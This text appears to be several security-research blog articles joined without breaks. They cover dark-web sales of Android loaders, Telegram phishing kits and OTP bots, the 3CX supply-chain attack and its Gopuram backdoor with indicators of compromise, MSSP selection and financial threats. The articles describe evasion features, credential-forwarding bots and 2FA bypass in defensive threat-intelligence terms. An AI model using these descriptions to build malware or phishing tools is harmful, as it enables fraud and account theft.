The loader uses minimum rights, doesn’t require special rights that need permission to be granted, the traffic between the loader and the server is AES-128 encrypted with an encryption key generated once after registration, and a dynamically used initialization vector (IV). Contacts admin panel every 10 seconds. Searches for APK to install every 60 seconds. If an APK is already installed, the loader starts it one time. The loader doesn’t bother users, but subtly asks to install the app. Stable launch after reboot. Adapted for uploading to Google Play. Evasion methods for functionality restrictions on the device are implemented. Offline when the screen is off (loader doesn’t need to stay online). Anti-emulator and Google geo IP check. Blocked in CIS. Convenient admin panel.

The reason for selling I mentioned in the source sale topic.

Variant 2

The payload is a module (dex) file, AES-128 encrypted, injected into the legit app resources. It is loaded when the app is launched (loading into memory, decryption and dumping into the app’s internal storage). Not for Google Play, blocks 80% of apps with Class Dex Loader.

Start: $1,500

Step: $200

Blitz: $7k

The bidding ends in 12 hours after the last bid.

You are welcome to use an escrow service

The offered blitz price is not the highest. Prices for loaders we observed on dark web forums range between $2,000 and $20,000, depending on the malware complexity, novelty and prevalence, as well as the additional functions. The average price for a loader is $6,975.

Example of average offer for a Google Play loader

However, if cybercriminals want to buy the loader source code, the price immediately rockets, reaching the upper limit of the price range.

Seller offers a Google Play loader source code for $20,000

As opposed to a loader, a Google Play developer account (either hacked or newly created by the cybercriminals) can be bought quite cheaply, for example, for $200, and sometimes even for as little as $60. The price depends on the account features, such as the number of already published apps, number of their downloads, etc.

User wants to buy a Google Play account with access to the developer’s email

In addition to the many offers for sale, we also found numerous messages on the dark web about wanting to buy a particular product or service for a certain price.

Cybercriminal looking for a new Google Play loader

User wants to buy a new loader because their developer “went on a binge”

See translation

Need a loader

Enough experience, current coder went on a binge, and we’re in search of an alternative

We know prices and the market, won’t rob you, from $7k to your price

DM your offers

Deposit on our side or with an escrow service
How deals are made

Sellers on the dark web offer whole packages of different tools and services. To keep their activities low-profile, a large percentage of attackers negotiate strictly through private messages on dark web forums or personal messages on social networks and in messengers, for example in Telegram.

It may seem that service providers could easily deceive buyers, and make a profit from their apps themselves. Often this is the case. However, it is also common among dark web sellers to maintain their reputation, promise guarantees, or accept payment after the terms of the agreement have been fulfilled. To reduce risks when making deals, cybercriminals often resort to the services of disinterested intermediaries — escrow services or middlemen. An escrow may be a special service and supported by a shadow platform, or a third party disinterested in the results of the transaction. Note, however, that on the dark web nothing eliminates the risk of being scammed with 100% probability.

Conclusion and recommendations

We continuously monitor the mobile threat landscape to keep our users safe and informed of the most important developments. Not long ago, we published a report about the threats smartphone users faced in 2022. However, looking at the volume of supply and demand of such threats on the dark web, we can assume that the number of threats in the future will only grow — and become more complex and advanced.

To stay protected from mobile threats:

• Do not enable the installation of unknown apps. If some app urges you to do it, it is most likely infected. If it is possible, uninstall the app, and scan the device with an antivirus.
• Check the permissions of the apps that you use and think carefully before granting an app permissions it doesn’t need to perform its main functions, especially when it comes to high-risk permissions such as Accessibility Services. The only permission that a flashlight app needs is to use the flashlight.
• Use a reliable security solution that can help you to detect malicious apps and adware before they start misbehaving on your device.
• Update your operating system and important apps as soon as updates become available. To be sure that an app update is benign, enable automatic system scan in your security solution, or scan the device right after the updates are installed.

For organizations, it is necessary to protect their developer accounts with strong passwords and 2FA, as well as monitor the dark web to detect and mitigate credential leaks as early as possible.

To inquire about Kaspersky threat monitoring services for your organization, please contact us at dfi@kaspersky.com.

Telegram has been gaining popularity with users around the world year by year. Common users are not the only ones who have recognized the messaging app’s handy features — cybercrooks have already made it a branch of the dark web, their Telegram activity soaring since late 2021.

The service is especially popular with phishers. They have become adept at using Telegram both for automating their activities and for providing various services — from selling phishing kits to helping with setting up custom phishing campaigns — to all willing to pay.

To promote their “goods”, phishers create Telegram channels through which they educate their audience about phishing and entertain subscribers with polls like, “What type of personal data do you prefer?”. Links to the channels are spread via YouTube, GitHub and phishing kits they make.

This story covers the variety of phishing services available on Telegram, their details and pricing, and ways of detecting phishing content that originates in Telegram.

The Telegram black market: what’s on offer

After reviewing phishers’ Telegram channels that we detected, we broke down the services they promoted into paid and free.

Free content for aspiring phishers Automated phishing with Telegram bots

Functional and configurable, Telegram bots help private users and businesses with automating many routine workflows, such as searching for and retrieving information on schedule, answering frequently asked questions from customers, setting up reminders and many others. Malicious actors use Telegram bots to automate illegal activities, such as generating phishing pages or collecting user data.

The process of creating a fake website with a Telegram bot typically includes the following steps:

1. The wannabe phisher joins the bot creator’s channel.

2. As a rule, the bot offers to select a language once started. In the example below, the bot speaks English and Arabic.

   Starting a Telegram phishing bot

3. The bot offers the user to create a new bot of their own and share the token with the main bot. The purpose of this second bot is to capture data of users who follow the phishing links and attempt to log in to the fake website. It is the budding scammer’s job to set up that new bot on Telegram, but that process is also automated and no rocket science.

   Phishing bot asking the user to set up a new bot and share the token

4. Once the user feeds the token to the first bot, it generates a series of links to fake websites hosted in the same domain. The sites may mimic various services: PUBG, Facebook, PayPal and so on.

   List of off-the-shelf pages in the same domain

Distributing the links is something the wannabe phisher has to do without any help from the bot. If a visitor enters their credentials on the fake page, a notification will be sent to the chat with the bot that our beginning scammer created while generating links to the fake page. The notification will typically contain the phishing link, the victim’s credentials, the name of the country that they logged in from, the country code and the IP address of the device that was used.

Message with the stolen data received by the phisher

Bots that generate phishing pages may differ slightly. For instance, before generating phishing links, one particular bot offers to select a service to mimic and enter a URL the victim will be redirected to after trying to log in. The latter is typically the Google home page or the main page of the service that the phishing page imitates. Once a URL is entered, the bot will generate several scam links targeting users of the service. In this case, victims’ credentials will be sent directly to the phishing bot.

List of services suggested by the bot

What are these fake pages that are so easy to generate? A victim who clicks a link in a message that promises, say, 1,000 likes in TikTok will be presented with a login form that looks like the real thing. The page typically contains nothing besides that form. We filled in the login and password fields in the screenshot below.

Fake TikTok login page generated by the phishing bot

From an engineering standpoint, this is a rather primitive product of a basic phishing kit. When a scammer requests a phishing page from a Telegram bot, it forwards the request along with all required data to a utility that assembles pages from predefined packages and returns hyperlinks. To forward the stolen data to the bot, phishing kits include a script into which the token of the bot that receives user credentials, Telegram bot chat identifier and a URL to redirect the user after entering their credentials will be inserted. Some scripts may lack the URL field.

Script to configure stolen data forwarding to the Telegram bot

By the way, there is no reason why the developer of a phishing kit cannot configure it to grab a copy of the data obtained by the unsuspecting newbie phisher.

Free phishing kits and users’ personal data

Scammer-operated Telegram channels sometimes post what appears to be exceptionally generous offers, for example, zipped up sets of ready-to-use phishing kits that target a large number of global and local brands.

Archive with phishing kits posted in a Telegram scam channel

Contents of a free phishing kit archive

Phishers also share stolen personal data with their subscribers, tagging it with information on whether it was verified or not. “Yellow light data” in the screenshot below stands for “unknown data quality”. This is probably an allusion to the yellow traffic light.

Files containing free credentials of US and Russian users

Why would scammers so generously share valuable data with others instead of using it for their own benefit? One reason is that any free content or manuals so willingly distributed by scammers to their Telegram audience serve as bait of sorts for less experienced phishers to bite. Newbies get a taste of what phishing tools can do, pull off their first scam and wish for more, which is when they will be offered paid content.

Another reason is recruiting an unpaid workforce. As mentioned above, the creators of phishing bots and kits can get access to data collected with tools they made. To attract larger audiences, scam operators advertise their services, promising to teach others how to phish for serious cash.

Ad for a Telegram channel offering phishing content

Paid offers for phishers on Telegram

Besides free phishing kits and bot-powered scams, Telegram fraudsters offer paid phishing pages and data, as well as phishing-as-a-service (PhaaS) subscriptions. The service may include access to phishing tools, as well as guides for beginners and technical support.

Paid phishing and scam pages

Malicious actors offer “premium” phishing and scam pages for sale. Unlike the primitive copies of popular websites, these offers include pages built from scratch with a range of advanced capabilities or tools for generating such pages. For instance, a “premium” page may include elements of social engineering, such as an appealing design, promises of large earnings, an anti-detection system and so on.

Scam pages offered for sale in Telegram

In the screenshot below, the seller promises that each of their “projects” has an anti-bot system, URL encryption, geoblocking and other features that attackers will find useful. The seller goes on to offer custom phishing pages that can include any components requested by the customer.

The seller’s description of advanced phishing page functionalities

After looking closer at these offers, we found that they do contain scripts to block web crawlers and anti-phishing technology. Therefore, these projects are essentially complex or advanced phishing kits.

Contents of a phishing kit archive with an anti-bot system

“Premium page” vendors update their anti-bot systems regularly, so the phishing contents could remain undetected and thus, usable.

Phishing page vendor announcing the anti-bot system has been updated

Prices for this kind of fake pages differ, with some vendors asking $10 per copy, and others charging $50 for an archive with several pages in it. A package that includes less frequently offered features, for example, 3-D Secure support, and assistance with configuring a fake website, may cost up to $300.

Scam page with 3-D Secure support offered for $280

User personal data for sale

Online banking credentials obtained through phishing techniques are often offered for sale too. Unlike the free data mentioned above, these have been checked, and even the account balances have been extracted. The higher the balance, the more money scammers will typically charge for the credentials.

For example, the same Telegram channel offered the credentials for a bank account with $1,400 in it for $110, whereas access to an account with a balance of $49,000 was put up for $700.

Offer of credentials for an account with a balance of $1,400

Offer of credentials for an account with a balance of $49,000

Phishing-as-a-Service

In addition to one-time sales of phishing kits and user data, scammers use Telegram channels to sell a range of subscriptions with customer support included. Support includes providing updates on a regular basis for the phishing tools, anti-detection systems and links generated by the phishing kits.

An OTP (one-time password) bot is another service available by subscription. Legitimate services use one-time passwords as a second authentication factor. Many organizations enforce a two-factor authentication (2FA) requirement these days, which makes it impossible to hijack an account with just the login and password. Phishers use OTP bots to try and hack 2FA.

The bots call users, posing as the organization maintaining the account that the phishers are trying to hack, and convince them to enter a 2FA code on their phones. The calls are fully automated. The bot then enters the code in a required field, giving the phisher access to the account.

List of OTP bot features and benefits

According to a bot vendor we talked to, a weekly subscription with unlimited calls will set a beginning scammer back $130, while a monthly subscription including bot customization costs as much as $500.

Our chat with the vendor about OTP bot pricing

Another OTP bot is offered on a pay-per-minute, prepaid basis. Rates start at $0.15 per minute depending on the destination. The bot can record calls and store settings, such as the victim’s phone number, name and so on.

OTP bot interface: the victim’s name and phone number, service name and language are required for setting up a call

A customer who shares this information with the bot creators, along with a screenshot showing the victim’s account number, balance and other details, may be rewarded with a small amount added to their OTP bot balance: $5 for two units of information and $10 for three or more.

Some PhaaS vendors take their customers’ trust seriously. In the screenshot below, you can see assurances that all data obtained with paid tools is reliably encrypted, so that neither the vendor nor any third parties can read it. All these vendors want is their customers to remain loyal.

PhaaS vendor explaining to customers that all their data is reliably encrypted

Detection and statistics

Despite phishers who offer their services in Telegram use many ways to avoid blocking, our systems detect their fake sites with maximum precision, adding them to our databases.

Malicious sites generated by phishing bots are either hosted in the same domain, or share parts of HTML code, or both. This makes it easy for our cyberthreat detection technology to discover them.

In the above example of a bot generating phishing pages the same domain was used to host fake websites that mimicked those of various legitimate organizations. We have detected a total of 1483 attempts to access pages located in that domain since it emerged.

Kaspersky anti-phishing detection statistics for a domain linked to a phishing bot, December 2022 through March 2023 (download)

Since many off-the-shelf phishing solutions offered on Telegram are basic or complex phishing kits, here are some relevant detection statistics on those. In the last six months, our technology has detected 2.5 million malicious URLs generated with phishing kits.

Number of detected malicious URLs generated with phishing kits, October 2022 through March 2023 (download)

We prevented 7.1 million attempts by users to access these malicious sites within the same period.

Kaspersky anti-phishing detection statistics for pages generated with phishing kits, October 2022 through March 2023 (download)

Takeaways

Wannabe phishers used to need to find a way onto the dark web, study the forums there and do other things to get started. The threshold to joining the phisher community lowered once malicious actors migrated to Telegram and now share insights and knowledge, often for free, right there in the popular messaging service.

Even the laziest and most cash-strapped can use Telegram bots offered by channel owners to generate phishing pages and obtain data stolen from their victims. Some attackers upload archives with data for anyone to make use of. An aspiring phisher who wishes to generate a greater variety of content can download phishing kits that target a wide range of organizations.

Scammers use an array of free offers to promote paid services. They are also likely manipulating newcomers into using their free phishing kits and bots, which can potentially share stolen data with their creators.

The more solvent audience are offered to pay for phishing pages with geoblocking functionality and regularly updated anti-bot systems, which are harder to detect than those generated with basic phishing kits and bots. Prices range from $10 to $300 and depend on the feature set. Phishers also sell stolen online baking credentials and offer OTP bots subscriptions that can be used to bypass 2FA.

A detailed review of available offers on Telegram phishing channels suggests that the bulk of these consists of phishing kits, which our technology successfully blocks: over the last six months, we have detected 2.5 million pages generated with phishing kits.

On March 29, Crowdstrike published a report about a supply chain attack conducted via 3CXDesktopApp, a popular VoIP program. Since then, the security community has started analyzing the attack and sharing their findings. The following has been discovered so far:

• The infection is spread via 3CXDesktopApp MSI installers. An installer for macOS has also been trojanized.
• The malicious installation package contains an infected dll library that decrypts a shellcode from the d3dcompiler_47.dll library’s overlay and executes it.
• The decrypted payload extracts C2 server URLs from icons stored in a GitHub repository (the repository is removed).
• The payload connects to one of the C2 servers, downloads an infostealer and starts it.
• The infostealer collects system information and browser history, then sends it to the C2 server.

As we reviewed available reports on the 3CX attack, we began wondering if the compromise concluded with the infostealer or further implants followed. To answer that question, we decided to review the telemetry we had on the campaign. On one of the machines, we observed a DLL named guard64.dll, which was loaded into the infected 3CXDesktopApp.exe process. Interestingly enough, we opened an investigation into a case linked to that DLL on March 21, about a week before the supply chain attack was discovered. A DLL with that name was used in recent deployments of a backdoor that we dubbed “Gopuram” and had been tracking internally since 2020. Three years ago, we were investigating an infection of a cryptocurrency company located in Southeast Asia. During the investigation, we found that Gopuram coexisted on victim machines with AppleJeus, a backdoor attributed to the Korean-speaking threat actor Lazarus.

Over the years, we observed few victims compromised with Gopuram, but the number of infections began to increase in March 2023. As it turned out, the increase was directly related to the 3CX supply chain attack. We found out that the threat actor specifically targeted cryptocurrency companies, dropping the following files on infected machines:

• C:\Windows\system32\wlbsctrl.dll, a malicious library (MD5: 9f85a07d4b4abff82ca18d990f062a84);
• C:\Windows\System32\config\TxR\<machine hardware profile GUID>.TxR.0.regtrans-ms, an encrypted shellcode payload.

Once dropped, wlbsctrl.dll becomes loaded on every startup by the IKEEXT service via DLL hijacking. We further saw DLLs with the names ualapi.dll and ncobjapi.dll being sideloaded into spoolsv.exe and WmiPrvSE.exe, respectively.

The wlbsctrl.dll library is responsible for decrypting and executing the shellcode stored in the C:\Windows\System32\config\TxR directory. The decryption is notably performed through the CryptUnprotectData API function that uses a different encryption key internally on every machine. This makes it difficult for researchers to decrypt the payload from the file without physical access to the victim machines.

Snippet of the loading function using CryptUnprotectData

The component loaded by the library is Gopuram’s main module. As mentioned above, its name in the export directory is guard64.dll. The job of the main module is to connect to a C2 server and request commands. The backdoor implements commands that allow the attackers to interact with the victim’s file system and create processes on the infected machine. Gopuram was additionally observed to launch in-memory modules. Just like the implants used in the 3CX campaign, Gopuram’s modules are DLL files that include an export function named DllGetClassObject. We have observed eight modules so far:

Module name Description Ping Pings a host specified in the argument. Connect Connects to a given host via a socket and waits for the server to send data. Registry Manipulates registry (lists, adds, deletes and exports keys). Service Manipulates (creates, lists, starts, stops and deletes) services. Timestomp Performs timestomping on files. Inject Performs payload injections through syscalls via mapping a shellcode to a remote process and creating a remote thread. KDU Kernel Driver Utility that allows an attacker to bypass driver signature enforcement. The utility is used to load an unsigned driver (MD5: F684E10FF1FFCDD32C62E73A11382896). The driver collects information about installed AV filters and writes it to the C:\Windows\System32\catroot2\edb.chk.log file. Update Encrypts a provided payload and writes it to the C:\Windows\System32\config\TxR\<machine hardware profile GUID>.TxR.0.regtrans-ms file. Net Partially implements features of the net command: management of users, groups, sessions and network shares.

The discovery of the new Gopuram infections allowed us to attribute the 3CX campaign to the Lazarus threat actor with medium to high confidence. Our attribution is based on the following facts:

• While investigating an attack on a Southeast Asian cryptocurrency company in 2020, we found Gopuram coexisting on the same machine with the AppleJeus backdoor, which is attributed to Lazarus.

• The Gopuram backdoor has been observed in attacks on cryptocurrency companies, which is aligned with the interests of the Lazarus threat actor.

• While looking for additional implants that used the same loader shellcode as the 3CX implants, we discovered a sample on a multiscanner service (MD5: 933508a9832da1150fcfdbc1ca9bc84c) loading a payload that uses the wirexpro[.]com C2 server. The same server is listed as an IoC for an AppleJeus campaign by Malwarebytes.

  First bytes of the loader shellcode used in 3CX and AppleJeus

  Note, though, that the shellcode is based on open-source code that has been used by other threat actors, for example, SilentBreak. Still, the use of that shellcode along with the 0xF558F4DA constant (which is the ROR13 hash for the string DllGetClassObject) is a more unique pattern.

• While investigating a malicious MSI file (MD5: ec3f99dd7d9dbce8d704d407b086e84f) that has been uploaded to a multiscanner service, we observed the following two events:

  • The dll library dropped from the MSI was observed to launch an in-memory payload that contacts the oilycargo[.]com domain. This domain name has previously been attributed to Lazarus by multiple researchers.

  • In our telemetry, we observed AvBugReport.exe, the executable hosting dll, to contain Gopuram’s main module payload, guard64.dll.

These four facts allow us to conclude that Lazarus is likely the threat actor deploying the Gopuram backdoor.

As for the victims in our telemetry, installations of the infected 3CX software are located all over the world, with the highest infection figures observed in Brazil, Germany, Italy and France.

As the Gopuram backdoor has been deployed to less than ten infected machines, it indicates that attackers used Gopuram with surgical precision. We additionally observed that the attackers have a specific interest in cryptocurrency companies.

As it turns out, the infostealer is not the only malicious payload deployed during the 3CX supply chain attack. The threat actor behind Gopuram additionally infects target machines with the full-fledged modular Gopuram backdoor. We believe that Gopuram is the main implant and the final payload in the attack chain. Our investigation of the 3CX campaign is still far from complete. We will continue analyzing the deployed implants to find out more details about the toolset used in the supply chain attack.

Gopuram indicators of compromise

MD5 hashes
9f85a07d4b4abff82ca18d990f062a84
96d3bbf4d2cf6bc452b53c67b3f2516a

File paths
C:\Windows\System32\config\TxR\<machine hardware profile GUID>.TxR.0.regtrans-ms
C:\Windows\system32\catroot2\edb.chk.log

More indicators of compromise and YARA rules for detecting Gopuram components are available for TIP subscribers. Contact intelreports@kaspersky.com for more details.

Managed Security Service Providers (MSSPs) have become an increasingly popular choice for organizations nowadays following the trend to outsource security services. Meanwhile, with the growing number of MSSPs in the market, it can be difficult for organizations to determine which provider will fit in the best way. This paper aims to provide guidance for organizations looking to select an MSSP and help to identify the benefits and drawbacks of using an MSSP.

To make an all-round choice, let’s try to answer the following questions:

• What exact services do we need?
• Why does my organization need an MSSP?
• When does my organization need an MSSP?
• Who should deliver the service?

MSSP Services

First, let’s start with what services we can expect. Here are some of the most common security services provided by MSSPs:

• Security Monitoring

  24/7 monitoring of the organization’s network, systems, and applications to identify potential security threats and anomalies; can be provided as an on-premises solution (when data must not leave the customer infrastructure) or as a service.

• Incident Response (IR)

  Responding to security incidents and breaches, investigating, and containing the incident. Incident Response can be provided in multiple forms, from recommendations for the customer IR team to pre-agreed response actions in the customer environment.

• Managed Detection and Response (MDR)

  A combination of the previous two services. Usually, MDR is considered an evolution of classic monitoring and response services due to the utilization of advanced threat-detection techniques. Also, MDR supports embedded response capabilities within the platform, which are supplied and fully managed by the service provider.

• Threat Intelligence (TI)

  Provision of intelligence on current and emerging threats to the organization’s security. The best-known and simplest form of TI is IoC feeds that indicate the presence in the customer environment of known signs of attacks. But there are other deliverables, too, focused on different maturity levels of TI consumers within the organization.

  Note that the use of TI requires an in-house security team, so it is not possible to fully outsource it. TI data has to be applied internally to bring value.

• Managed Security Solutions

  Multiple services focused on administering security solutions that are deployed in customer environments. These services are commonly bundled if the customer wants on-premise deployment of MSSP technologies.

There is an extended set of services not directly involved in day-to-day operations, but still valuable on a one-time or regular basis.

• Digital Forensics and Incident Response (DFIR) or Emergency Incident Responder

  The ultimate form of incident response that provides a full-scale DFIR service in case of critical incidents in the customer environment.

• Malware Analysis

  A narrow-focus service providing extended reporting and behavior analysis of submitted malware. The service requires an in-house team to properly utilize the analysis results.

• Security Assessment

  A group of services focused on the identification of target infrastructure or application vulnerabilities, weaknesses, and potential attack vectors. Among the best-known services are penetration testing, application security assessment, red teaming, and vulnerability assessment.

• Attack Surface Management (ASM)

  A service focused on the collection of information related to the organization’s public-facing assets.

• Digital Footprint Intelligence (DFI)

  A service focused on searching for, collecting, and analyzing organization-related threats in external sources. Typical deliverables include information about leaked accounts, organization-related tracks in malware logs, post and advertisements for the sale of infrastructure access, and a list of actors who can target the organization. Clearly, DFI replaced many TI tasks related to external sources processing.

As we can see, some services can replace the overall function of the in-house team (monitoring, MDR, assessment), while others can be considered as additional support for the existing team (TI, malware analysis, DFIR). The overall scenario of MSSP usage – whenever the function is required and can’t be provided within the organization. So, a key task for the organization is to define its needs, priorities, and available resources.

Scenarios for MSSP involvement

Switching to MSSP involvement scenarios can provide significant value.

Scenario 1

The typical one: you need to establish a specific function quickly. In such cases, an MSSP will save you time and money, and provide value in the short term. This case is applicable whenever you want to implement or test some additional services in your SOC.

Scenario 2

You have to build a security function from scratch. Even if, in the end, all security services should be built in-house, the involvement of an MSSP will be a good idea, since like in scenario 1 it helps to get the service up and running. Later, you can transfer specific services to the in-house team, considering all service aspects and expertise obtained from the MSSP by your team. At the same time, such an approach will help you to implement security functions step-by-step, replacing MSSP services one by one, focusing on one topic at a time, and avoiding security interruptions due to missing services.

Scenario 3

You need extensive growth. Whenever your business is growing, cybersecurity cannot always follow with the same speed. Especially in cases of company mergers and acquisitions, the IT landscape jumps to a new level that cannot be covered promptly by an in-house team. This case can transform into scenario 1 or 2, depending on the nature of this growth. If it’s a one-time event, probably later you’d like to transfer the function to the in-house team, when it will be ready to handle the new volume.

All the more reasons to engage an MSSP

Besides specific cases, there are common reasons to support engaging an MSSP over developing in-house capability. Here are some of them:

• Lack of In-House Expertise

  Many organizations do not have the necessary in-house expertise to effectively manage and respond to security threats. Some roles and functions require deep knowledge and continuous growth of expertise, which cannot be maintained within the organization. At the same time, an MSSP has a chance to work simultaneously with multiple customers, therefore the intensity of incidents and conducted investigations are much higher and generates more experience for MSSP teams.

• Resource Constraints

  Smaller organizations may not have the resources to build and manage a comprehensive security program. An MSSP can provide the necessary security services to help these organizations mitigate security risks without having to hire a full security team and, in more complex cases, to maintain this full-scale team in the long term.

• Cost Savings

  It can be expensive to build and maintain an in-house security program. Outsourcing security services to an MSSP can be a more cost-effective solution, particularly for smaller organizations. Also, the MSSP approach allows you to spread the budget over time, since establishing a service in-house requires significant investments from day one.

• Scalability

  Fast-growing organizations may find it difficult to scale their security program at the same pace. An MSSP can provide scalable security services able to grow with the organization.

• Flexibility

  In case of outsourcing, it is much easier to manage the level of service, from playing with the SLA options for a particular MSSP to changing provider every time the preconditions change or a better proposal emerges in the market.

  Overall, an MSSP can help organizations improve their security posture, manage risk, and ensure compliance while optimizing costs and resource constraints. Considering the reasons for involving an MSSP, to complete the picture, we must mention not only the pros but the cons as well. Possible stop factors to think twice about are:

• Increasing risk

  Every new partner extends the potential attack surface of your organization. During the contract lifetime, you should consider the risks of MSSP compromise and supply-chain attacks on the service, especially if the MSSP has a high level of privileges (usually required under a contract for advanced Incident Response). The provider can mitigate the risk by demonstrating complex cybersecurity program, applied by their infrastructure and independent assessments.

  Also, it’s important to off-board the MSSP correctly in case of contract termination. This off-boarding should include careful access revocation and rollback of all changes done in the network, configurations, etc.

• Lack of understanding

  Do you know what is within your infrastructure, and how business processes are tied to the IT environment? What is typical and normal in your network? Do you have an asset DB? What about an account registry and a list of full regularly reviewed privileges? I guess not all answers were positive. Bad news: the MSSP will have an even less clear understanding of what is within the protected environment, since its only trustful source of information is you.

• Need to control the MSSP

  It is essential to conduct a thorough analysis and evaluation of every service contract, particularly when it comes to selecting an MSSP. To achieve this, an expert from within the organization should be assigned to handle the contract and carefully scrutinize all details, conditions, and limitations. Additionally, the service delivery should be closely observed and evaluated throughout the lifetime of the contract. Generally, this means that it is not possible to entirely outsource the security function without establishing at least a small security team in-house. Moreover, the output from the service should be processed by an internal team, especially in cases where incidents, anomalies, or misconfigurations are detected.

In-house or MSSP for SMB

The decision between using an MSSP or building an in-house SOC for small and medium-sized business (SMB) can depend on various factors, including the organization’s budget, resources, and security needs. Here are some MSSP benefits provided in SMB cases:

• Expertise

  MSSP can provide a level of expertise in security that may not be available in-house, particularly for smaller organizations with limited security resources. Commonly, SBM does not have a security team at all.

• Cost

  Building an in-house SOC is an expensive way that includes the cost of hiring experienced security professionals, investing in security tools and technologies, and building a security infrastructure.

• Scalability

  As an SMB grows, its security needs may also grow. An MSSP can provide scalable security services that can grow with the organization without investing in additional security resources.

Overall, for many SMBs, outsourcing security services to an MSSP can be a more cost-effective solution than building an in-house SOC.

For large enterprises, as in other complex cases, the answer will be “it depends.” There are a lot of factors to be considered.

Finding the balance

Considering the pros and cons of outsourcing security services, I suggest finding the right balance. One balanced way can be a hybrid approach in which the organization builds some services in-house and outsources others.

The first variation of the hybrid approach is to build core functions (like Security Monitoring, Incident Response, etc.) by yourself and outsource everything that would make no sense to build in-house. Such an approach lets you build strong core functions and not waste time and resources on functions that require narrow skills and tools. Any MSSP services we have mentioned in the extended category are good candidates for such an approach.

Another variant of the hybrid approach is to develop the expertise of incident responders, who know the environment and are able to respond to advanced attacks. Incident detection and initial analysis in this case can be outsourced, which gives better scalability and the ability to focus on serious matters.

The transition approach fits the conditions when you need to build a security function right here and now, but still focus on the later development of an in-house SOC. So, you can start with outsourcing security services and gradually replacing them one by one with in-house functions, whenever the team, technologies, and resources will be ready.

Choosing the right one

As a very first step, we have to define our needs, the services we are looking for, and the overall strategy we are going to follow in outsourcing security services, considering everything we have discussed before.

The next step is to choose the right provider. Here are the criteria to keep in mind during the screening procedure:

• Look for expertise and experience

  Choose an MSSP with the necessary expertise. Pay attention to experience with clients in your region/industry as well as well-known global players. Consider the number of years in the market – it is usually simpler to find a proven partner than take a chance with a disruptive new player.

  Threat detection and cyberthreat hunting are related to security research. Check if the MSSP has appropriate research capabilities that can be measured by number and depth of publications related to new APT groups, tools and techniques used, and methods of detection and investigation.

  Another significant point is the team. All services are provided by individual people, so make sure that the MSSP employs qualified personnel with the required level of education and world-recognized certification.

• Consider the MSSP’s technology

  Ensure that the MSSP uses relevant tool and technologies to provide effective security solutions. A simple example: if the MSSP is focused on Windows protection, that will not fit an environment built on Unix. There are more nuances regarding MSSP technology platforms, which we will come back to later.

• Check for compliance

  Ensure that the MSSP follows industry compliance regulations and standards if applicable to your business.

• Evaluate customer experience and support

  Find references and success stories and collect feedback from other companies – clients of the potential service provider. Focus on customer support experience, including responsiveness, availability, and expertise.

• Consider SLA

  Type, what metrics are used, and how are these metrics tracked and calculated. And, of course, SLA target values that can be provided by the vendor.

• Consider the cost

  Compare the cost of MSSP services from different providers and choose the one that, other things being equal, offers the best value for your business.

• Security

  Does the vendor pay attention to the security topic: cybersecurity hygiene, regular assessments by external experts? That is only a small part to check if you don’t want to lower your protection.

• Ask for proof of concept (PoC)

  Mature players provide a test period, so you can have hands-on experience with most aspects of service provision and deliverables.

The technology question is a bit tricky. In most cases, we can split MSSPs into two big groups: the first use enterprise solutions, the second self-developed tools or open source with customization.

The first group needs to share their revenue with the vendor providing technology, but if later you decide to build an on-prem SOC platform, the migration can be simplified if you choose the same vendor platform. Also, you won’t need to implement too many changes in your environment. Furthermore, if the organization intends to adopt a transition approach and establish an in-house SOC based on a specific technology, the use of an MSSP with the corresponding technical solution can serve as an “extended test drive” for the chosen platform.

The second group usually focuses on a highly custom solution that lets the MSSP fine-tune the technology platform for better results. In a lot of cases, this can be a conglomerate of multiple tools and platforms, integrated to provide more advanced detection and analysis methods. Commonly this platform cannot be adopted by customers for independent usage.

Another question we should mention: is it worth splitting services between multiple providers? On the one hand, such diversity can help to choose the best provider for specific services; on the other, you can feel the synergy of multiple services provided by the same vendor in a bundle. E.g., if you have monitoring from one provider, the provision of DFIR by the same company will create positive synergy due to the ability to exchange information about historical incidents and to continuously monitor DFIR IoCs.

Buying defensive services, don’t forget about offensive assessments, and checking contract conditions for to conduct red teaming, pen tests or conducting cyber ranges. Any type of assessment will be valuable to proof MSS value and train your team.

Summary

When selecting an MSSP, it is important for organizations to keep their security goals in mind and align them with the criteria used for evaluation. With a large number of players in the market, it is always possible to choose the one that best meets the organization’s specific requirements and strategy. Careful consideration of factors such as service offerings, reputation, technology, and cost will help organizations find the right MSSP to meet their security needs.

Financial gain remains the key driver of cybercriminal activity. In the past year, we’ve seen multiple developments in this area – from new attack schemes targeting contactless payments to multiple ransomware groups continuing to emerge and haunt businesses. However, traditional financial threats – such as banking malware and financial phishing, continue to take up a significant share of such financially-motivated cyberattacks.

In 2022, we saw a major upgrade of the notorious Emotet botnet as well as the launch of massive campaigns by Emotet operators throughout the year. For instance, malicious spam campaigns targeting organizations grew 10-fold in April 2022, spreading Qbot and Emotet malware. We also witnessed the emergence of new banking Trojans that hunt for banking credentials, and greater activity on the part of some well-known ones, such as Dtrack, Zbot and Qbot.

The good news is that regardless of these continuous advancements, we’ve witnessed a steady decrease in the number of attacks by banking Trojans. Security solutions integrated into operating systems, two-factor authentication and other verification measures have helped reduce the number of vulnerable users. Additionally, in many markets mobile banking has been pushing out online banking, with more and more convenient and secure banking apps emerging.

Meanwhile, cryptocurrency became a prominent target for those seeking monetary gain. The amount of cryptocurrency-related phishing grew significantly in 2022, and with an endless array of new coins, NFT and other DeFi projects, scammers are continuously duping users. Funds lost via cryptocurrency are hard to track and impossible to return with the help of a regulatory body, as is done with banks and fiat currency, so this trend is likely to continue gaining traction.

Some advanced persistent threat (APT) actors also started tapping into the cryptocurrency market. We previously reported on the Lazarus group, which developed VHD ransomware for the purpose of monetary gain. Now we see that APT actors have also switched to crypto. BlueNoroff developed an elaborate phishing campaign that targeted startups and distributed malware for stealing all crypto in the account tied to the device. They impersonated numerous venture capital groups and investors with considerable success. The NaiveCopy campaign, another example of an advanced threat, targeted stock and cryptocurrency investors in South Korea. And there is more room for further development – hardware wallets and smart contracts could provide a new juicy target for attackers.

This report shines a spotlight on the financial cyberthreat landscape in 2022. It presents a continuation of our previous annual financial threat reports (2018, 2019, 2020, 2021), which provide an overview of the latest trends across the threat landscape. We look at phishing threats commonly encountered by users and companies, as well as the dynamics of various Windows and Android-based financial malware.

Methodology

For this report, we conducted a comprehensive analysis of financial cyber threats in 2022. We focused on malicious software that targets financial services institutions such as online banking, payment systems, e-money services, online stores, and cryptocurrency services. This category of financial malware also includes those seeking unauthorized access to financial organisations’ IT infrastructures.

In addition to financial malware, we also examined phishing activities. This entailed studying the design and distribution of financially themed web pages and emails that impersonate well-known legitimate sites and organizations with the intention of deceiving potential victims into disclosing their private information.

